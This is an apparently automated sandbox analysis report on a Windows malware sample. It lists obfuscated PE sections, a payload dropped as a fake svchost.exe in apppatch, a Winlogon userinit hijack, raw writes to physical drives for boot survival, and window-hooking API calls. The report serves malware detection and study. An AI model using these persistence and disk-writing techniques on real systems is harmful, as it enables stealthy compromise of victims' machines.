Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32
Source: Z8eHwAvqAh.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: swvGCAxOMikYQeoQzimiprVu.exe, 0000000A.00000002.2167317620.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000000B.00000000.2059290079.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000000D.00000000.2061299411.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000012.00000000.2065037016.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000016.00000000.2086064782.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000019.00000000.2093471617.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000001B.00000002.2109184378.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000001D.00000000.2106806222.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000001F.00000000.2111283138.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000021.00000002.2120935619.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000023.00000002.2130306173.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000025.00000002.2134588404.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000027.00000002.2140976598.000000000056E000.00000002.00000001.01000000.00000009.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeUnpacked PE file: 1.2.Z8eHwAvqAh.exe.400000.0.unpack .text:ER;.dHGmL:R;.lzmjSu:W;.YOSWO:R;.sTDEgl:R;.fwQO:R;.L:W;.D:W;.data:W;.kubC:W;.hkw:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeUnpacked PE file: 25.2.swvGCAxOMikYQeoQzimiprVu.exe.1590000.2.unpack
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeUnpacked PE file: 31.2.swvGCAxOMikYQeoQzimiprVu.exe.1110000.2.unpack
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeUnpacked PE file: 1.2.Z8eHwAvqAh.exe.400000.0.unpack
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_004020E0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,1_2_004020E0
Source: Z8eHwAvqAh.exeStatic PE information: real checksum: 0x3c9353d5 should be: 0x410a0
Source: svchost.exe.1.drStatic PE information: real checksum: 0x3d792ae1 should be: 0x410a0
Source: Z8eHwAvqAh.exe Static PE information: section name: .dHGmL
Source: Z8eHwAvqAh.exe Static PE information: section name: .lzmjSu
Source: Z8eHwAvqAh.exe Static PE information: section name: .YOSWO
Source: Z8eHwAvqAh.exe Static PE information: section name: .sTDEgl
Source: Z8eHwAvqAh.exe Static PE information: section name: .fwQO
Source: Z8eHwAvqAh.exe Static PE information: section name: .L
Source: Z8eHwAvqAh.exe Static PE information: section name: .D
Source: Z8eHwAvqAh.exe Static PE information: section name: .kubC
Source: Z8eHwAvqAh.exe Static PE information: section name: .hkw
Source: svchost.exe.1.dr Static PE information: section name: .dHGmL
Source: svchost.exe.1.dr Static PE information: section name: .lzmjSu
Source: svchost.exe.1.dr Static PE information: section name: .YOSWO
Source: svchost.exe.1.dr Static PE information: section name: .sTDEgl
Source: svchost.exe.1.dr Static PE information: section name: .fwQO
Source: svchost.exe.1.dr Static PE information: section name: .L
Source: svchost.exe.1.dr Static PE information: section name: .D
Source: svchost.exe.1.dr Static PE information: section name: .kubC
Source: svchost.exe.1.dr Static PE information: section name: .hkw
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_0044B895 push cs; retf 0004h 1_2_0044B8F5
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_0044E89D push es; iretd 1_2_0044E8AC
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_0044B1E0 push eax; ret 1_2_0044B20E
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_0044B55E pushad ; ret 1_2_0044B569
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_0044B56A push eax; ret 1_2_0044B56D
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_0044B576 push ss; ret 1_2_0044B579
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_0044EF69 push cs; iretd 1_2_0044EF78
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_0044EF33 push cs; ret 1_2_0044EF48
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_0226016A push ds; ret 1_2_0226016B
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_0226063D push ds; ret 1_2_022605F1
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_0226063D push ebx; ret 1_2_02260677
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_02260678 push dword ptr [esp+48h]; ret 1_2_02260747
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_022604C7 push ds; ret 1_2_022604E6
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_022605A1 push ds; ret 1_2_022605F1
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_022605A1 push ebx; ret 1_2_02260677
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_01328B33 push cs; ret 22_2_01328B48
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_01328B69 push cs; iretd 22_2_01328B78
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_01324DE0 push eax; ret 22_2_01324E0E
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_0132849D push es; iretd 22_2_013284AC
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_012C61E0 push eax; ret 22_2_012C620E
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_012C989D push es; iretd 22_2_012C98AC
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_012C6895 push cs; retf 0004h 22_2_012C68F5
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_012B68D2 push ebp; retf 22_2_012B68D3
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_012C656A push eax; ret 22_2_012C656D
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_012C6576 push ss; ret 22_2_012C6579
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_012C655E pushad ; ret 22_2_012C6569
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_012ACD5C push ebp; retf 22_2_012ACD5D
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_012B664C push ebp; retf 22_2_012B664D
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 25_2_015D8B69 push cs; iretd 25_2_015D8B78
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 25_2_015D8B33 push cs; ret 25_2_015D8B48
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 25_2_015D4DE0 push eax; ret 25_2_015D4E0E

Persistence and Installation Behavior

Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 22_2_012F33F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 25_2_015A33F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 27_2_00AF33F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 29_2_012B33F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 31_2_011233F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 33_2_013033F0
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe File created: C:\Windows\apppatch\svchost.exe
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Executable created and started: C:\Windows\apppatch\svchost.exe
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: API: WriteFile string: \\?\globalroot\systemroot\system32\tasks\ 1_2_00403560

Boot Survival

Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 22_2_012F33F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 25_2_015A33F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 27_2_00AF33F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 29_2_012B33F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 31_2_011233F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 33_2_013033F0
Source: C:\Windows\apppatch\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon userinit
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Hooking and other Techniques for Hiding and Protection

Source: c:\users\user\desktop\z8ehwavqah.exe File moved: C:\Users\user\AppData\Local\Temp\14B3.tmp
Source: unknown Network traffic detected: HTTP traffic on port 64057 -> 8000
Source: unknown Network traffic detected: HTTP traffic on port 8000 -> 64057
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012ED300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,22_2_012ED300
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012ECD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,22_2_012ECD50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012ECDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,22_2_012ECDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012ECFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,22_2_012ECFE9
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012E9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,22_2_012E9ED0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_0159D300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,25_2_0159D300
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_0159CD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,25_2_0159CD50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_0159CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,25_2_0159CDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_0159CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,25_2_0159CFE9
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_01599ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,25_2_01599ED0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AED300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,27_2_00AED300
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AECDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,27_2_00AECDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AECD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,27_2_00AECD50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AE9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,27_2_00AE9ED0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AECFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,27_2_00AECFE9
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012AD300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,29_2_012AD300
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012ACD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,29_2_012ACD50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012ACDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,29_2_012ACDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012ACFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,29_2_012ACFE9
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012A9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,29_2_012A9ED0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0111D300 